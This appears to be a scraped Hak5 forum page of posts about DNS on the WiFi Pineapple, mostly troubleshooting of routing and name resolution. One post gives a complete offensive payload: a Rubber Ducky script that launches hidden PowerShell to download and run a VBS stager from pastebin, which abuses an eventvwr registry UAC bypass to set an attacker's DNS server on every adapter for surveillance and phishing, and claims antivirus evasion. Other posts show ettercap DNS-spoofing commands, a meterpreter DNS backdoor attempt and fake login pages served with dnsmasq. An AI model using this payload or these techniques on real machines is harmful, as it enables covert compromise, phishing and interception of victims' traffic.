Search the Community

I want the pineapple to use dnsspoof on specific devices not all connected devices, is that possible?

Hi i have a wierd problem where my wifi pinapple looks like it's connected to the internett but it don't get dns lookup so it don't work. It works on my android device with cable and the pinapple app, this is wierd but dns lookups when bridging trough my new install of ubuntu 16.04 LTS with all updates installed and dnsmasq disabled My wifi pinapple can ping the internet eks: 8.8.8.8 #WIFI pinapple ##Ping root@pie:~# ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: seq=0 ttl=55 time=18.029 ms ##NSLOOKUP root@pie:~# nslookup vg.no Server: 127.0.0.1 Address 1: 127.0.0.1 localhost (No respons) ##NSLOOKUP with different dns server defined root@pie:~# nslookup vg.no 8.8.8.8 Server: 8.8.8.8 (No respons) ## WGET test to adobe.com (IP 192.150.16.117) root@pie:~# wget 192.150.16.117 --no-check-certificate --2017-04-26 19:45:11-- http://192.150.16.117/ Connecting to 192.150.16.117:80... connected. HTTP request sent, awaiting response... 302 Moved Temporarily Location: https://192.150.16.117:6081/php/urladmin.php?vsys=1&cat=16383&title=unknown&rulename=Internet Access&sip=10.3.100.3&post=0&token=913AB4C748D6DE9FFDA3664A4FB58B279D2A2B9C&url=http://192.150.16.117%2f [following] --2017-04-26 19:45:11-- https://192.150.16.117:6081/php/urladmin.php?vsys=1&cat=16383&title=unknown&rulename=Internet Access&sip=10.3.100.3&post=0&token=913AB4C748D6DE9FFDA3664A4FB58B279D2A2B9C&url=http://192.150.16.117%2f Connecting to 192.150.16.117:6081... connected. WARNING: certificate common name 'sd1-pa-01.int.honeysec.com' doesn't match requested host name '192.150.16.117'. HTTP request sent, awaiting response... 200 OK Length: 3030 (3.0K) [text/html] Saving to: 'index.html' index.html 100%[===================>] 2.96K --.-KB/s in 0s 2017-04-26 19:45:12 (23.0 MB/s) - 'index.html' saved [3030/3030] ## ifconfig root@pie:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:C0:CA:8F:9A:CC inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2147 errors:0 dropped:0 overruns:0 frame:0 TX packets:2035 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:371610 (362.9 KiB) TX bytes:846393 (826.5 KiB) eth0 Link encap:Ethernet HWaddr 00:C0:CA:8F:9A:CC UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2155 errors:0 dropped:0 overruns:0 frame:0 TX packets:2044 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:402148 (392.7 KiB) TX bytes:846807 (826.9 KiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:193 errors:0 dropped:0 overruns:0 frame:0 TX packets:193 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:12840 (12.5 KiB) TX bytes:12840 (12.5 KiB) wlan0 Link encap:Ethernet HWaddr 00:C0:CA:8F:69:4A UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:1566 (1.5 KiB) wlan1 Link encap:Ethernet HWaddr 00:C0:CA:8F:84:37 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) wlan2 Link encap:Ethernet HWaddr 00:19:86:51:80:16 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) ## Route root@pie:~# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 172.16.42.42 0.0.0.0 UG 0 0 0 br-lan 172.16.42.0 * 255.255.255.0 U 0 0 0 br-lan ## IP-Tables root@pie:~# sudo iptables -L -ash: sudo: not found root@pie:~# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination delegate_input all -- anywhere anywhere Chain FORWARD (policy ACCEPT) target prot opt source destination delegate_forward all -- anywhere anywhere Chain OUTPUT (policy ACCEPT) target prot opt source destination delegate_output all -- anywhere anywhere Chain delegate_forward (1 references) target prot opt source destination forwarding_rule all -- anywhere anywhere /* user chain for forwarding */ ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED zone_lan_forward all -- anywhere anywhere zone_usb_forward all -- anywhere anywhere Chain delegate_input (1 references) target prot opt source destination ACCEPT all -- anywhere anywhere input_rule all -- anywhere anywhere /* user chain for input */ ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED syn_flood tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN zone_lan_input all -- anywhere anywhere zone_usb_input all -- anywhere anywhere Chain delegate_output (1 references) target prot opt source destination ACCEPT all -- anywhere anywhere output_rule all -- anywhere anywhere /* user chain for output */ ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED zone_lan_output all -- anywhere anywhere zone_usb_output all -- anywhere anywhere Chain forwarding_lan_rule (1 references) target prot opt source destination Chain forwarding_rule (1 references) target prot opt source destination Chain forwarding_usb_rule (1 references) target prot opt source destination Chain forwarding_wan_rule (1 references) target prot opt source destination Chain input_lan_rule (1 references) target prot opt source destination Chain input_rule (1 references) target prot opt source destination Chain input_usb_rule (1 references) target prot opt source destination Chain input_wan_rule (1 references) target prot opt source destination Chain output_lan_rule (1 references) target prot opt source destination Chain output_rule (1 references) target prot opt source destination Chain output_usb_rule (1 references) target prot opt source destination Chain output_wan_rule (1 references) target prot opt source destination Chain reject (0 references) target prot opt source destination REJECT tcp -- anywhere anywhere reject-with tcp-reset REJECT all -- anywhere anywhere reject-with icmp-port-unreachable Chain syn_flood (1 references) target prot opt source destination RETURN tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN limit: avg 25/sec burst 50 DROP all -- anywhere anywhere Chain zone_lan_dest_ACCEPT (6 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain zone_lan_forward (1 references) target prot opt source destination forwarding_lan_rule all -- anywhere anywhere /* user chain for forwarding */ zone_wan_dest_ACCEPT all -- anywhere anywhere /* forwarding lan -> wan */ zone_usb_dest_ACCEPT all -- anywhere anywhere /* forwarding lan -> usb */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port forwards */ zone_lan_dest_ACCEPT all -- anywhere anywhere Chain zone_lan_input (1 references) target prot opt source destination input_lan_rule all -- anywhere anywhere /* user chain for input */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port redirections */ zone_lan_src_ACCEPT all -- anywhere anywhere Chain zone_lan_output (1 references) target prot opt source destination output_lan_rule all -- anywhere anywhere /* user chain for output */ zone_lan_dest_ACCEPT all -- anywhere anywhere Chain zone_lan_src_ACCEPT (1 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain zone_usb_dest_ACCEPT (3 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain zone_usb_forward (1 references) target prot opt source destination forwarding_usb_rule all -- anywhere anywhere /* user chain for forwarding */ zone_lan_dest_ACCEPT all -- anywhere anywhere /* forwarding usb -> lan */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port forwards */ zone_usb_dest_ACCEPT all -- anywhere anywhere Chain zone_usb_input (1 references) target prot opt source destination input_usb_rule all -- anywhere anywhere /* user chain for input */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port redirections */ zone_usb_src_ACCEPT all -- anywhere anywhere Chain zone_usb_output (1 references) target prot opt source destination output_usb_rule all -- anywhere anywhere /* user chain for output */ zone_usb_dest_ACCEPT all -- anywhere anywhere Chain zone_usb_src_ACCEPT (1 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain zone_wan_dest_ACCEPT (3 references) target prot opt source destination Chain zone_wan_forward (0 references) target prot opt source destination forwarding_wan_rule all -- anywhere anywhere /* user chain for forwarding */ zone_lan_dest_ACCEPT esp -- anywhere anywhere /* @rule[7] */ zone_lan_dest_ACCEPT udp -- anywhere anywhere udp dpt:isakmp /* @rule[8] */ zone_lan_dest_ACCEPT all -- anywhere anywhere /* forwarding wan -> lan */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port forwards */ zone_wan_dest_ACCEPT all -- anywhere anywhere Chain zone_wan_input (0 references) target prot opt source destination input_wan_rule all -- anywhere anywhere /* user chain for input */ ACCEPT udp -- anywhere anywhere udp dpt:bootpc /* Allow-DHCP-Renew */ ACCEPT icmp -- anywhere anywhere icmp echo-request /* Allow-Ping */ ACCEPT igmp -- anywhere anywhere /* Allow-IGMP */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port redirections */ zone_wan_src_ACCEPT all -- anywhere anywhere Chain zone_wan_output (0 references) target prot opt source destination output_wan_rule all -- anywhere anywhere /* user chain for output */ zone_wan_dest_ACCEPT all -- anywhere anywhere Chain zone_wan_src_ACCEPT (1 references) target prot opt source destination # Now over to the host (ubuntu 16.04 box) computer ## Verifying that dnsmasq is disabled (tested with dnsmasq also same problem) master@Castle:~$ more /etc/NetworkManager/NetworkManager.conf [main] plugins=ifupdown,keyfile,ofono #dns=dnsmasq [ifupdown] managed=false ## DNS server used by host master@Castle:~$ more /etc/resolv.conf # Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8) # DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN nameserver 10.3.3.1 search (redacted) ## verifying that DNS works master@Castle:~$ nslookup adobe.com Server: 10.3.3.1 Address: 10.3.3.1#53 Non-authoritative answer: Name: adobe.com Address: 192.150.16.117 ## ifconfig on the ubuntu host root@Castle:/home/master# ifconfig eth0 Link encap:Ethernet HWaddr 00:c0:ca:8f:b3:ea inet addr:172.16.42.42 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2771 errors:0 dropped:0 overruns:0 frame:0 TX packets:2897 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:961043 (961.0 KB) TX bytes:580359 (580.3 KB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:700 errors:0 dropped:0 overruns:0 frame:0 TX packets:700 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:53380 (53.3 KB) TX bytes:53380 (53.3 KB) wlan0 Link encap:Ethernet HWaddr 44:1c:a8:e1:88:5b inet addr:10.3.100.3 Bcast:10.3.100.255 Mask:255.255.255.0 inet6 addr: fe80::abec:d514:8472:1ac3/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:21566 errors:0 dropped:0 overruns:0 frame:0 TX packets:16288 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:23408735 (23.4 MB) TX bytes:1627835 (1.6 MB) ## iptables on the ubuntu host root@Castle:/home/master# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination ACCEPT all -- 172.16.42.0/24 anywhere state NEW ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED Chain OUTPUT (policy ACCEPT) target prot opt source destination ## Routes on the host root@Castle:/home/master# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.3.100.1 0.0.0.0 UG 0 0 0 wlan0 10.3.100.0 * 255.255.255.0 U 600 0 0 wlan0 link-local * 255.255.0.0 U 1000 0 0 wlan0 172.16.42.0 * 255.255.255.0 U 0 0 0 eth0 I have bashed my head all day at this problem and i am not a step closer to a solution. Please someone help figure this out. I can't be the onlyone with this problem.

Works like a charm if Bunny detects as 2Gb adapter (takes precedence over host's NIC) https://github.com/pojebus/bashbunny-payloads/tree/master/payloads/library/dns_spoofer

Here is the file - https://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=dns-remoteshell.pcap And a screenshot - http://i64.tinypic.com/6gwu2v.jpg I have to analyse this file and answer several questions about it, like, small description of the events and weather this shows an attack, but I'm new to Wireshark so I'm a bit lost. If anyone could have a look and get back to me that would be great!

Hello I have set up my Nano to share my wlan0 internet on Kali. I followed all the instructions including running the latest wp6.sh script. The Nano can ping IP addresses but can not resolve URL's. i.e you can ping 216.58.203.110 but not google.com. I am thinking just change the DNS server on the NANO but how do you do this? Should be easy but not proving so. Help appreciated. Mike

Hello, please excuse my noobishery, but I have been searching around on how to set the DNS server a client is provided when they connect to the Wifi Pineapple Nano. Any kind of help or redirect would be greatly appreciated.

Hello I have a problem. I have 3 questions about modules 1. How do I add my my own rolls to the random roll module and how do I add my own images for css of the pineapple interface ? 2 What is the difference between DNSSpoof and DNSMasq Spoof ? 3. How to use both dnsspoof and dnsmasqspoof ? Thanks in advance

This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie

Hi I'm experimenting with Ettercap to perform MiTM attacks, and DNS-spoof. My setup exists out of two laptops. Laptop A running Kali Linux 2.0 and is the 'attacker' machine (IP: 192.168.0.131), and Laptop B running Windows 7 as 'victim' (IP: 192.168.0.150). I'm encountering a few problems when I try this, first of all, the command 'route' doesn't find my actual default gateway. It says the default is '192.168.0.0', but Ettercap and the Windows machine say it is '192.168.0.1' which is the correct one. But that ain't he biggest problem, the biggest problem is, that my DNS-spoof attack is working when performing it using the Ettercap-GUI. But as soon as I try to do it by using the terminal it fails; it doesn't even intercept the requests made from the victim. My command: ettercap -T -q -i wlan0 -M arp:remote -P dns_spoof //192.168.0.1//192.168.0.150// What is wrong with this command, because the attack works in graphical mode there is something wrong with the command, not with my network setup. I also made a video showing the problem: https://sendvid.com/8o8p2ssz like you can see there it is working graphical, but not from terminal using the command. And than my second question Can someone point me in the right direction/tutorial on how to use this attack with SSLstrip? This to perform a downgrade attack to also be able to DNS-spoof SSL-protected (HTTPS) websites. Of course I have searched myself, but none tutorial or video found showing it with Ettercap etc. Thanks!

I recently got a WiFi PineApple and managed to setup a working openvpn connection. My issue is when i go to http://dnsleaktest.com what is shown as my resolver is my default's internet connection when on the VPN connection I use google's DNS resolvers 8.8.8.8 and 8.8.4.4.With this known I can not seem to create a up script that will allow me to get the right DNS servers to be shown and used. I know this is not just a openvpn/openwrt issue so there must be some way to write a script that will force the use of the passed DNS servers from openvpn. I noticed the "issue" is also with my Ubuntu system that I'm using. with the Ubuntu system I know how to fix that issue but not with the WiFi PineApple

Sometime when you need to map networks, for example when you gain access to a LAN server without security tools on it, it can be useful to retrieve reverses dns for a specified internal PI. You can do it directly in bash with this short command line (example for 192.168.1.0/24) : seq 1 254 |xargs -I{} -n 1 host 192.168.1.{} It also works fine on a public PI of course. Don't hesitate to share your tips too :) -- Christophe Casalegno https://twitter.com/Brain0verride

Hello, I have just received my Tetra. I have it mostly set up except for DNS. I need to change the default DNS from whatever it is set at to my routers address (Port 53 is blocked unless it's my router) If I change /etc/resolv.conf to add my nameserver will that mess any modules up and will it mess up my Tetra?

I searched and researched but I'm not 100% sure of what I'm looking for. So my Clients are my iphone and Chromebook. When I check out my wifi info I get the router (nano) info which is the usual: IP - 172.16.42.* Subnet - 255.255.255.0 router - 172.16.42.1 DNS - 172.16.42.1 search domains - lan What do I need to do to change these from showing their current information? Also, I've played around with the Kernel IP routing table under the Networking menu and all it ever seems to do is erase the top default row which is usually the wifi wlan2 is connected to. What else can I do with the Default Route input? Thank you. EDIT: There is this thread but i'm looking to keep my wlan0-1/brlan ip of 172.16.42.1:1471 and give out a different IP block to the clients on wlan0

So here are the facts i am working with kali sana trying to spoof dns with ethercap 1.internal network 2.I can spoof dns ===> when pinging facebook.com from victim machine i get my internal IP (192.168.1.6) 3.but when i try to browse with edge, chrome to facebook.com it says no connection 4.when i spoof a different url i get the index page of the server of the attacker 5.tried to spoof dns on xp and on windows 10 same results how can i solve this problem and what is the cause Thank you in advance

Hi, Lanturtle works fine. Static IP was set, same settings as the direct LAN port on PC (DHCP addresses go through proxy....) Strange thing is, when LAN cable is directly connected I can ping. When LAN cable is attached to the Lanturtle, I can't ping. But I have network, (I can Google, I have connection to SSHFS folder, etc......) Also external DNS's are resolved, internals not. Any ideas?

Hello , I cant make a backdoor that works with a dns , I want to use Veil to bypass the AV but it does not work . What I use in Veil : - I use python/shellcode_inject/base64_substitution - For payload windows/meterpreter/reverse_tcp_dns Veil asks me 2 times for a lhost . What I use in Metasploit : - multi/handler - payload is windows/meterpreter/reverse_tcp_dns - lhost is my local ip - lport is my port It works witout a dns. Please help .

I just become my Pineapple. I've installed it, connected it via LAN to Notebook. The Notebook was connected over WLAN to Internet. I'm using Windows. Sharing of WLAN Adapter is enabled. LAN Connection (to Pineapple) configured: 172.16.42.42, Subnet: 255.255.255.0, Default Gateway: none, DNS 8.8.8.8 Connection form Notebook to Pineapple works fine. Connection from Smartphone to Pineapple works fine. But no DNS was resolved. Ping (via Putty) to www.google.com was not working. Ping to 173.194.67.104 (IP of google.com) was working. With Smartphone: when I go to www.google.com -> Site was not resolved. When I type 173.194.67.104 in browser: google.com was showing. Route: Destination Gateway Genmask Flags Metric Ref Use Iface default 172.16.42.42 0.0.0.0 UG 0 0 0 br-lan 172.16.42.0 * 255.255.255.0 U 0 0 0 br-lan What do I making wrong?

Hey guys, I work in IT support and enjoy tinkering with things like Kali Linux, Raspberry PI, ect... My wife recently started seeing some vulger ads on normal websites like CNN, Local News, and others. I started seeing similar things on my laptop very soon after. I did tthe normal checking for malware and things. I eventually checked the router settings nd found the DNS servers were set to static IPs instead of DHCP from he ISP. I chaged it back to auto, abd the vulger ads and things stoped. I checked the logs to see what happened but all the logs were deleted. After the reboot the logs were showing a DOS attack blocked. I think this was something like a man in the middle attack or something simlar. I'd like to know how they were able to get into my router and change the DNS servers and delete the logs. I've alredy did the basics post-attack steps like change passwords and things. Thanks guys!

hiii i have make some fake pages for known pages like Facebook etc i have also install dnsmasq in Kali and setup Apache server and every thing is okay now when the victim visit Facebook in chrome for example it will told him that this is unsecured cuz of https is there any way or tools in Kali to avoid that or any other thing would be greet thanks :)

Hey everyone. I have a pretty random question today. Is it possible for you to have a website, that's fully functional, and publically accessible, without a domain name attached to it? So let's say you have a dedicated web server running apache or iis, it has a publically facing IP address, and the router it's behind can pass port 80 traffic to it, no problem. If people knew the IP address for this host, can they access the website and bypass a domain name, and therefore bypass any sort of DNS resolution? I know you can get to a website by using it's IP address, but I'm wondering if it would work without ANY domain name attached to it. This address would not be listed in the local DNS records right? Is this possible? Thanks guys!

Why don't we use the innate ability of dnsmasq to spoof hosts instead of dnsspoof? I noticed that the pineapple would reply to my queries twice when using dnsspoof (instead of once as I expected). After some research http://blog.philippheckel.com/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ I noticed that is it 1. entirely possible thus moving away from the hit and miss of dnsspoof and 2. would make it much neater. Should we look into creating an infusion maybe? Wishing you all well, Cristian

Dear Hak5 Community, Whilst playing around with the Wifi Pineapple MK5 -> dnsspoof and I noticed that whilst I would receive the spoofed reply, dnsmasq would also send the correct record. I then started investigating dnsmasq and I noticed that it is possible to use it in order to spoof hosts directly. The problem I have with dnsspoof is that sometimes the browser would get the correct reply thus making this module less useful. When using dnsmasq the success rate is 100%. Do any of you know why we are not dropping dnsspoof and use dnsmasq instead? I have a proof of concept infusion, but before I work on it any more I would like to know if anyone could foresee any issues with using dnsmasq instead of dnsspoof. Kind regards, Cristian

Hello everyone, I have create a very simple html which is the only page i want my clients to see. Like a captive portal but not intrested in giving them internet connection. I am having problems with nodogsplash which does not redirect any traffic when my pineapple is not connected to the internet. I know i can use "Evil Portal" but i am trying to make this manual. I also noticed that nodogsplash is at 0.9_beta9.9.9 but opkg brings 0.9_beta9.9.6 (not only pineapple, openwrt too) Does the pineapple have to be connected to the internet for nodogsplash to work? Is there a way to replicate the iptables rules nodogsplash creates? Is there any good alternative "captive portal manager" you can suggest? My nodogsplash.conf My /etc/config/dhcp Running: nodogsplash -d 7 -f and it stays like this even when clients connect. As an alternative i tried dnsspoof and iptables (one at a time and both together) My spooofhost.conf dnsspoof -i br-lan -f spoofhost.conf iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 172.16.42.1 and iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1 In this case it redirects traffic to 172.16.42.1 but if pineapple is not connected to the internet Android and iPhone Devices cannot betect the "captive portal" and pop the pseudo browser.

I'm running MK5 firmware 1.2.0 When I ssh onto the box and run "ping google.com", it fails, but "ping 74.125.225.129" it works fine, same with traceroute. This also means that clients that connect via Karma have internet issues. I have the pineapple connected through ethernet to my windows laptop, which is connected to internet over wifi, following this guide: root@Pineapple:~# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 172.16.42.42 0.0.0.0 UG 0 0 0 br-lan 172.16.42.0 * 255.255.255.0 U 0 0 0 br-lan How would I go about debugging this?

I'm trying to set up a VPN tunnel for all traffic connected to the Pineapple in client mode, with the tunnel endpoint being my Ubuntu VPS out in the cloud. The goal here is to provide internet access to all clients connected to the Pineapple, while enabling more powerful MitM attacks like Metasploit using my VPS. I've installed OpenVPN on both my server and Pineapple and set up their respective keys, but I am at a loss now as to the proper configuration. Tun? Tap? Br0? lo? Should I be using tap0 or tun0 for each side of the tunnel? (And how does it hook into the pineapple's traffic?) Could someone kindly sketch out the ideal configs for this kind of setup? In an earlier post, Sebkinne referred a user to this "howto", which specifies the client [=pineapple] as tap0. Forgive my ignorance, but don't you want to make the OpenVPN client side [=pineapple] "tun0" and the OpenVPN tunnel's endpoint on the ubuntu server "tap0"? (Which in turn redirects internet traffic to its internet-facing eth0 interface?) I'm lost. In advance, thank very much for any help you can offer.